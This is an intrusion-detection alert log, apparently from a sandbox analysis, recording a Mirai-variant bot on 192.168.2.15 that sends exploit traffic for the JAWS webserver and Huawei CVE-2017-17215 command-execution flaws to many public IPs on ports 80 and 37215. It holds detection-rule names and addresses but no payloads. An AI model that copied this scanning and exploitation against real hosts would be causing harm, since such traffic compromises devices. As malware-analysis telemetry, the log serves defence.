                                                          2025-02-04T18:11:39.798420+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.155796651.139.218.3680TCP
                                                          2025-02-04T18:11:39.798420+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.155796651.139.218.3680TCP
                                                          2025-02-04T18:11:39.800330+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154199225.233.224.3880TCP
                                                          2025-02-04T18:11:39.800330+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154199225.233.224.3880TCP
                                                          2025-02-04T18:11:39.822459+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1546296139.225.240.17280TCP
                                                          2025-02-04T18:11:39.822459+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1546296139.225.240.17280TCP
                                                          2025-02-04T18:11:39.823341+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154239298.228.221.17680TCP
                                                          2025-02-04T18:11:39.823341+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154239298.228.221.17680TCP
                                                          2025-02-04T18:11:39.869788+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154999862.3.220.6680TCP
                                                          2025-02-04T18:11:39.869788+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154999862.3.220.6680TCP
                                                          2025-02-04T18:11:39.870198+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1545680176.100.12.17680TCP
                                                          2025-02-04T18:11:39.870198+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1545680176.100.12.17680TCP
                                                          2025-02-04T18:11:39.871007+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.155830895.141.34.8680TCP
                                                          2025-02-04T18:11:39.871007+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.155830895.141.34.8680TCP
                                                          2025-02-04T18:11:40.063768+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1537782156.181.117.10337215TCP
                                                          2025-02-04T18:11:40.067528+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1538036156.87.226.22737215TCP
                                                          2025-02-04T18:11:40.401916+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1540210197.5.14.4937215TCP
                                                          2025-02-04T18:11:40.535891+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1552372186.209.63.20080TCP
                                                          2025-02-04T18:11:40.535891+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1552372186.209.63.20080TCP
                                                          2025-02-04T18:11:40.737541+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154854619.119.179.10780TCP
                                                          2025-02-04T18:11:40.737541+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154854619.119.179.10780TCP
                                                          2025-02-04T18:11:40.741244+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154955632.109.104.680TCP
                                                          2025-02-04T18:11:40.741244+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154955632.109.104.680TCP
                                                          2025-02-04T18:11:40.782556+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.15337649.119.226.18580TCP
                                                          2025-02-04T18:11:40.782556+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.15337649.119.226.18580TCP
                                                          2025-02-04T18:11:40.782847+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1552170156.166.231.24337215TCP
                                                          2025-02-04T18:11:40.783346+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1556370197.206.55.4637215TCP
                                                          2025-02-04T18:11:40.813951+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1547682222.146.115.15380TCP
                                                          2025-02-04T18:11:40.813951+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1547682222.146.115.15380TCP
                                                          2025-02-04T18:11:40.813985+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1543710155.48.55.4180TCP
                                                          2025-02-04T18:11:40.813985+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1543710155.48.55.4180TCP
                                                          2025-02-04T18:11:40.815963+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1558146161.215.111.3780TCP
                                                          2025-02-04T18:11:40.815963+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1558146161.215.111.3780TCP
                                                          2025-02-04T18:11:40.819661+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1543058125.144.55.23680TCP
                                                          2025-02-04T18:11:40.819661+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1543058125.144.55.23680TCP
                                                          2025-02-04T18:11:40.869899+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1559318162.28.10.14880TCP
                                                          2025-02-04T18:11:40.869899+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1559318162.28.10.14880TCP
                                                          2025-02-04T18:11:40.870111+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154979274.137.199.23180TCP
                                                          2025-02-04T18:11:40.870111+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154979274.137.199.23180TCP
                                                          2025-02-04T18:11:40.909562+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1547526204.176.132.11080TCP
                                                          2025-02-04T18:11:40.909562+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1547526204.176.132.11080TCP
                                                          2025-02-04T18:11:40.923093+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.155081641.137.88.11837215TCP
                                                          2025-02-04T18:11:40.956193+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.153724884.0.101.24480TCP
                                                          2025-02-04T18:11:40.956193+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.153724884.0.101.24480TCP
                                                          2025-02-04T18:11:40.960009+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.155817241.106.217.5537215TCP
                                                          2025-02-04T18:11:40.991452+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1533738156.129.236.10037215TCP
                                                          2025-02-04T18:11:41.034633+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.154373241.238.27.18537215TCP
                                                          2025-02-04T18:11:41.038420+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1533010207.26.197.3680TCP
                                                          2025-02-04T18:11:41.038420+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1533010207.26.197.3680TCP
                                                          2025-02-04T18:11:41.054205+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1536766143.23.249.3880TCP
                                                          2025-02-04T18:11:41.054205+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1536766143.23.249.3880TCP
                                                          2025-02-04T18:11:41.063882+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.155346841.90.199.4137215TCP
                                                          2025-02-04T18:11:41.067835+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1539476197.75.231.24837215TCP
                                                          2025-02-04T18:11:41.087036+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.155893641.130.45.5537215TCP
                                                          2025-02-04T18:11:41.096679+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1556738156.106.230.15037215TCP
                                                          2025-02-04T18:11:41.096874+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154502232.71.11.10180TCP
                                                          2025-02-04T18:11:41.096874+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154502232.71.11.10180TCP
                                                          2025-02-04T18:11:41.128485+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.155089842.77.12.9580TCP
                                                          2025-02-04T18:11:41.128485+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.155089842.77.12.9580TCP
                                                          2025-02-04T18:11:41.161397+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.155362617.53.64.20780TCP
                                                          2025-02-04T18:11:41.161397+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.155362617.53.64.20780TCP
                                                          2025-02-04T18:11:41.241387+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.155346435.94.114.16180TCP
                                                          2025-02-04T18:11:41.241387+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.155346435.94.114.16180TCP
                                                          2025-02-04T18:11:41.241658+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154206479.68.93.2380TCP
                                                          2025-02-04T18:11:41.241658+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154206479.68.93.2380TCP
                                                          2025-02-04T18:11:41.266869+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1541752180.247.222.11980TCP
                                                          2025-02-04T18:11:41.266869+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1541752180.247.222.11980TCP
                                                          2025-02-04T18:11:41.272562+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1556602126.182.35.20580TCP
                                                          2025-02-04T18:11:41.272562+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1556602126.182.35.20580TCP
                                                          2025-02-04T18:11:41.298784+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.156008640.54.178.14180TCP
                                                          2025-02-04T18:11:41.298784+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.156008640.54.178.14180TCP
                                                          2025-02-04T18:11:41.304523+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1546724206.199.245.3680TCP
                                                          2025-02-04T18:11:41.304523+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1546724206.199.245.3680TCP
                                                          2025-02-04T18:11:41.331767+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.153651493.55.208.18480TCP
                                                          2025-02-04T18:11:41.331767+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.153651493.55.208.18480TCP
                                                          2025-02-04T18:11:41.706603+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1555504156.195.158.21637215TCP
                                                          2025-02-04T18:11:41.764834+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1549716156.231.34.24337215TCP
                                                          2025-02-04T18:11:41.814107+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1539428183.119.84.21480TCP
                                                          2025-02-04T18:11:41.814107+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1539428183.119.84.21480TCP
                                                          2025-02-04T18:11:41.814109+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154019225.68.126.5080TCP
                                                          2025-02-04T18:11:41.814109+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154019225.68.126.5080TCP
                                                          2025-02-04T18:11:41.831245+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.155944054.197.207.1380TCP
                                                          2025-02-04T18:11:41.831245+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.155944054.197.207.1380TCP
                                                          2025-02-04T18:11:41.831388+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1540176144.229.87.24280TCP
                                                          2025-02-04T18:11:41.831388+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1540176144.229.87.24280TCP
                                                          2025-02-04T18:11:41.833264+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1540888197.51.196.23237215TCP
                                                          2025-02-04T18:11:41.869999+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.153401240.144.172.480TCP
                                                          2025-02-04T18:11:41.869999+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.153401240.144.172.480TCP
                                                          2025-02-04T18:11:41.870000+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154562042.210.68.20780TCP
                                                          2025-02-04T18:11:41.870000+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154562042.210.68.20780TCP
                                                          2025-02-04T18:11:41.870769+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1558574204.137.209.7580TCP
                                                          2025-02-04T18:11:41.870769+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1558574204.137.209.7580TCP
                                                          2025-02-04T18:11:41.925193+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.153398241.247.70.437215TCP
                                                          2025-02-04T18:11:41.939451+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1555982197.229.162.8237215TCP
                                                          2025-02-04T18:11:41.942683+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1535342197.165.49.3137215TCP
                                                          2025-02-04T18:11:41.954575+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.153456441.160.92.13937215TCP
                                                          2025-02-04T18:11:41.960349+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1538700197.211.217.17437215TCP
                                                          2025-02-04T18:11:41.970172+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1543636197.225.24.5537215TCP
                                                          2025-02-04T18:11:42.807366+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1555376151.3.92.18780TCP
                                                          2025-02-04T18:11:42.807366+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1555376151.3.92.18780TCP
                                                          2025-02-04T18:11:42.816530+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1533914130.194.192.13180TCP
                                                          2025-02-04T18:11:42.816530+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1533914130.194.192.13180TCP
                                                          2025-02-04T18:11:42.831571+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1538374166.170.65.20480TCP
                                                          2025-02-04T18:11:42.831571+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1538374166.170.65.20480TCP
                                                          2025-02-04T18:11:42.871695+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1550488200.200.243.5680TCP
                                                          2025-02-04T18:11:42.871695+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1550488200.200.243.5680TCP
                                                          2025-02-04T18:11:42.871750+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1533266191.252.64.22180TCP
                                                          2025-02-04T18:11:42.871750+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1533266191.252.64.22180TCP
                                                          2025-02-04T18:11:42.871925+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1556554145.56.156.19580TCP
                                                          2025-02-04T18:11:42.871925+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1556554145.56.156.19580TCP
                                                          2025-02-04T18:11:42.872282+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1546742187.194.10.19680TCP
                                                          2025-02-04T18:11:42.872282+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1546742187.194.10.19680TCP
                                                          2025-02-04T18:11:42.872397+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.153321827.157.203.19680TCP
                                                          2025-02-04T18:11:42.872397+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.153321827.157.203.19680TCP
                                                          2025-02-04T18:11:42.872723+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154399223.137.87.16780TCP
                                                          2025-02-04T18:11:42.872723+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154399223.137.87.16780TCP
                                                          2025-02-04T18:11:42.873953+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1550216180.142.123.2780TCP
                                                          2025-02-04T18:11:42.873953+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1550216180.142.123.2780TCP
                                                          2025-02-04T18:11:42.892068+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1547328117.127.29.4480TCP
                                                          2025-02-04T18:11:42.892068+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1547328117.127.29.4480TCP
                                                          2025-02-04T18:11:42.894055+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.155437258.27.47.22280TCP
                                                          2025-02-04T18:11:42.894055+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.155437258.27.47.22280TCP
                                                          2025-02-04T18:11:42.898202+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.155089813.138.57.21480TCP
                                                          2025-02-04T18:11:42.898202+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.155089813.138.57.21480TCP
                                                          2025-02-04T18:11:42.914695+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154224090.177.70.1080TCP
                                                          2025-02-04T18:11:42.914695+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154224090.177.70.1080TCP
                                                          2025-02-04T18:11:42.970033+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1560952156.136.36.3237215TCP
                                                          2025-02-04T18:11:42.989615+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.154499241.7.140.15137215TCP
                                                          2025-02-04T18:11:42.989623+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1548144156.60.233.037215TCP
                                                          2025-02-04T18:11:43.053941+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1551524186.177.39.20080TCP
                                                          2025-02-04T18:11:43.053941+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1551524186.177.39.20080TCP
                                                          2025-02-04T18:11:43.143875+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1544120179.210.59.21180TCP
                                                          2025-02-04T18:11:43.143875+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1544120179.210.59.21180TCP
                                                          2025-02-04T18:11:43.195580+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1547236194.139.104.20380TCP
                                                          2025-02-04T18:11:43.195580+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1547236194.139.104.20380TCP
                                                          2025-02-04T18:11:43.301991+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1558230219.172.14.2980TCP
                                                          2025-02-04T18:11:43.301991+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1558230219.172.14.2980TCP
                                                          2025-02-04T18:11:43.313904+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1549030166.123.231.17980TCP
                                                          2025-02-04T18:11:43.313904+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1549030166.123.231.17980TCP
                                                          2025-02-04T18:11:43.415622+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154806617.196.195.9580TCP
                                                          2025-02-04T18:11:43.415622+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154806617.196.195.9580TCP
                                                          2025-02-04T18:11:43.442774+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1547862126.24.223.9880TCP
                                                          2025-02-04T18:11:43.442774+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1547862126.24.223.9880TCP
                                                          2025-02-04T18:11:43.458803+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1543838220.194.72.14680TCP
                                                          2025-02-04T18:11:43.458803+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1543838220.194.72.14680TCP
                                                          2025-02-04T18:11:43.538505+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1556918199.63.47.20980TCP
                                                          2025-02-04T18:11:43.538505+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1556918199.63.47.20980TCP
                                                          2025-02-04T18:11:43.552474+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.15383482.113.145.2680TCP
                                                          2025-02-04T18:11:43.552474+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.15383482.113.145.2680TCP
                                                          2025-02-04T18:11:43.565862+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154616866.85.21.13980TCP
                                                          2025-02-04T18:11:43.565862+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154616866.85.21.13980TCP
                                                          2025-02-04T18:11:43.646587+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1538874193.2.130.24580TCP
                                                          2025-02-04T18:11:43.646587+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1538874193.2.130.24580TCP
                                                          2025-02-04T18:11:43.689135+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154943270.252.93.5980TCP
                                                          2025-02-04T18:11:43.689135+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154943270.252.93.5980TCP
                                                          2025-02-04T18:11:43.720254+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154319674.202.42.980TCP
                                                          2025-02-04T18:11:43.720254+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154319674.202.42.980TCP
                                                          2025-02-04T18:11:43.806078+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154885476.137.1.18080TCP
                                                          2025-02-04T18:11:43.806078+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154885476.137.1.18080TCP
                                                          2025-02-04T18:11:43.829513+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.153659683.133.89.18280TCP
                                                          2025-02-04T18:11:43.829513+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.153659683.133.89.18280TCP
                                                          2025-02-04T18:11:43.867323+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.15543868.144.12.8880TCP
                                                          2025-02-04T18:11:43.867323+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.15543868.144.12.8880TCP
                                                          2025-02-04T18:11:43.867370+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.15444229.135.213.1680TCP
                                                          2025-02-04T18:11:43.867370+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.15444229.135.213.1680TCP
                                                          2025-02-04T18:11:43.867556+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1556248220.183.243.17280TCP
                                                          2025-02-04T18:11:43.867556+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1556248220.183.243.17280TCP
                                                          2025-02-04T18:11:43.868604+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154954439.92.130.20680TCP
                                                          2025-02-04T18:11:43.868604+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154954439.92.130.20680TCP
                                                          2025-02-04T18:11:43.868635+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.153712431.174.97.13580TCP
                                                          2025-02-04T18:11:43.868635+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.153712431.174.97.13580TCP
                                                          2025-02-04T18:11:43.868693+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.155822260.220.250.24980TCP
                                                          2025-02-04T18:11:43.868693+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.155822260.220.250.24980TCP
                                                          2025-02-04T18:11:43.868926+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.153928084.153.123.23580TCP
                                                          2025-02-04T18:11:43.868926+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.153928084.153.123.23580TCP
                                                          2025-02-04T18:11:43.869677+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1549952160.19.223.2580TCP
                                                          2025-02-04T18:11:43.869677+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1549952160.19.223.2580TCP
                                                          2025-02-04T18:11:43.869785+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1538648137.251.33.15480TCP
                                                          2025-02-04T18:11:43.869785+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1538648137.251.33.15480TCP
                                                          2025-02-04T18:11:43.869864+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1554582211.243.248.19280TCP
                                                          2025-02-04T18:11:43.869864+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1554582211.243.248.19280TCP
                                                          2025-02-04T18:11:43.869866+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1545518139.241.185.9680TCP
                                                          2025-02-04T18:11:43.869866+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1545518139.241.185.9680TCP
                                                          2025-02-04T18:11:43.869894+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1552556174.26.69.18780TCP
                                                          2025-02-04T18:11:43.869894+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1552556174.26.69.18780TCP
                                                          2025-02-04T18:11:43.869951+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1535476171.186.242.2280TCP
                                                          2025-02-04T18:11:43.869951+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1535476171.186.242.2280TCP
                                                          2025-02-04T18:11:43.869968+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1535974128.120.255.480TCP
                                                          2025-02-04T18:11:43.869968+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1535974128.120.255.480TCP
                                                          2025-02-04T18:11:43.870098+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154116254.251.33.1880TCP
                                                          2025-02-04T18:11:43.870098+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.154116254.251.33.1880TCP
                                                          2025-02-04T18:11:43.870103+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1549432141.20.42.23880TCP
                                                          2025-02-04T18:11:43.870103+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1549432141.20.42.23880TCP
                                                          2025-02-04T18:11:43.870148+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.153561097.197.78.24180TCP
                                                          2025-02-04T18:11:43.870148+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.153561097.197.78.24180TCP
                                                          2025-02-04T18:11:43.870212+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.1545780126.176.228.19780TCP
                                                          2025-02-04T18:11:43.870212+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.1545780126.176.228.19780TCP
                                                          2025-02-04T18:11:43.876728+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.153642250.52.226.19580TCP
                                                          2025-02-04T18:11:43.876728+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.153642250.52.226.19580TCP
                                                          2025-02-04T18:11:43.877396+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.154379423.15.127.18380TCP
